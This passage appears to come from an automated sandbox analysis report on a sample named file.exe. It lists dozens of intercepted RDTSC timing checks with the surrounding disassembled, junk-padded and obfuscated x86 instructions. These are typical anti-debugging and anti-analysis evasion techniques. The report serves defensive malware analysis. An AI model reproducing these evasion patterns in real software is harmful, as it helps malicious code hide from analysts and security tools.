Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A63E second address: B1A67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add esi, dword ptr [ebp+122D3580h] 0x00000012 push 00000000h 0x00000014 ja 00007F0AD8C6A9BCh 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D2D45h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A67A second address: B1A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A67E second address: B1A684 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1AF82 second address: B1AF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1AF9A second address: B1AFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1C0AC second address: B1C129 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F0AD95F8826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0AD95F8828h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F0AD95F8837h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0AD95F8828h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+1244EE55h], edi 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D5DF second address: B1D5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D2F8 second address: B1D317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD95F8834h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D5E3 second address: B1D5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D5E9 second address: B1D5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D5EF second address: B1D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21DEE second address: B21DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21DF2 second address: B21DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22EB3 second address: B22EBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22EBD second address: B22ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0AD8C6A9C2h 0x0000000d jbe 00007F0AD8C6A9BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2403A second address: B24056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0AD95F8826h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24056 second address: B2405A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2405A second address: B240BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0AD95F8828h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1D80h], ecx 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+12450094h], eax 0x0000002f pop edi 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+1246257Ah], ecx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122DB8C3h], ecx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0AD95F8835h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F37 second address: B24F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F3B second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F48 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0AD8C6A9B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F0AD8C6A9C7h 0x00000027 push 00000000h 0x00000029 add edi, 7ED3A103h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0AD8C6A9B8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, 6EFFF232h 0x00000051 mov bh, 15h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jbe 00007F0AD8C6A9B8h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F0AD8C6A9BEh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25E96 second address: B25F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0AD95F8833h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, A1D5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F0AD95F882Bh 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122DB8AFh], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 jmp 00007F0AD95F8833h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0AD95F882Ah 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26D9B second address: B26DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26DA1 second address: B26DAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B260C1 second address: B26131 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0AD8C6A9B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2E64h], ecx 0x0000002d mov bx, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnp 00007F0AD8C6A9BCh 0x0000003d add dword ptr [ebp+122D1894h], ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a or dword ptr [ebp+122D339Fh], edx 0x00000050 mov eax, dword ptr [ebp+122D10E9h] 0x00000056 sbb di, CE16h 0x0000005b mov ebx, dword ptr [ebp+122D2BDDh] 0x00000061 push FFFFFFFFh 0x00000063 stc 0x00000064 nop 0x00000065 pushad 0x00000066 jnc 00007F0AD8C6A9BCh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26EEC second address: B26F0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0AD95F8835h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26F0D second address: B26F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26FD0 second address: B26FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A176 second address: B2A17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B281C4 second address: B281C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E34E second address: B2E352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E352 second address: B2E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD95F8835h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F1E0 second address: B2F1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0AD8C6A9B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A4A5 second address: B2A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2C45E second address: B2C4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov edi, 2734DDEBh 0x00000016 sub dword ptr [ebp+122D1AB2h], esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, CE72h 0x00000027 mov eax, dword ptr [ebp+122D04BDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0AD8C6A9B8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 sbb bh, FFFFFF9Ah 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F0AD8C6A9B8h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3016A second address: B3016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D477 second address: B2D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E468 second address: B2E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0AD95F882Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2C4E7 second address: B2C4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3016E second address: B301F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0AD95F8828h 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F0AD95F8836h 0x00000014 jmp 00007F0AD95F8830h 0x00000019 nop 0x0000001a pushad 0x0000001b mov dl, C1h 0x0000001d mov dword ptr [ebp+122D339Fh], ebx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0AD95F8828h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1CF2h], edx 0x00000046 push 00000000h 0x00000048 sub dword ptr [ebp+122D34B1h], eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0AD95F882Bh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0AD95F8833h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E47C second address: B2E481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B301F3 second address: B30200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D557 second address: B2D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D55B second address: B2D583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F882Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B350BF second address: B350CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B394BB second address: B394C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0AD95F8826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF384 second address: ADF39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF39A second address: ADF3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF3A2 second address: ADF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C41 second address: B38C5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0AD95F882Fh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C5E second address: B38C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C62 second address: B38C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C68 second address: B38C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C6E second address: B38C78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C78 second address: B38C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a jnp 00007F0AD8C6A9BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38DC0 second address: B38DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F75D second address: B3F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F763 second address: B3F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F770 second address: B3F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F776 second address: B3F793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0AD95F882Fh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F793 second address: B3F7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F854 second address: B3F85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F85E second address: B3F893 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jnl 00007F0AD8C6A9B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e je 00007F0AD8C6A9DEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0AD8C6A9BDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F950 second address: B3F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F968 second address: B3F96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43D98 second address: B43D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B441C8 second address: B441FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f push edx 0x00000010 je 00007F0AD8C6A9B6h 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b jmp 00007F0AD8C6A9C2h 0x00000020 pop ebx 0x00000021 ja 00007F0AD8C6A9BEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B441FE second address: B44204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4436C second address: B44373 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44373 second address: B4437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4437C second address: B44380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4476E second address: B44774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B44774 second address: B4477E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4477E second address: B4479D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0AD95F8836h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DC7B second address: B4DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F0AD8C6A9BEh 0x0000000c pop ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCA9 second address: B4DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCAD second address: B4DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCB1 second address: B4DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8831h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DCE2 second address: B4DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CD1D second address: B4CD27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
